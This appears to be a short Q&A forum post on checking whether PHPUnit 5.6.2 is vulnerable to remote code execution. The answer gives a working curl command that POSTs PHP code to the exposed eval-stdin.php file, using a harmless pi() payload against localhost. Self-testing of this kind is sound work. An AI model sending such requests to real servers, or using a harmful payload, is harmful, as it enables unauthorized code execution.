0 votes
by (111 points)
Lets I've installed PHPUnit version is 5.6.2. Which is vulnerable to Remote Code Execution. How can I check this vulnerability?

1 Answer

0 votes
by (172 points)

Let's you have that vulnerable PHPUnit in http://localhost/vendor/phpunit/.

So you can check by printing the value of pi using this cURL command.

$ curl --data "<?php echo(pi());" http://localhost/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Welcome to Codeshikari Q&A, where you can ask any vulnerability related questions and receive answers from the experts of the community. Screenshot-from-2019-03-15-23-08-47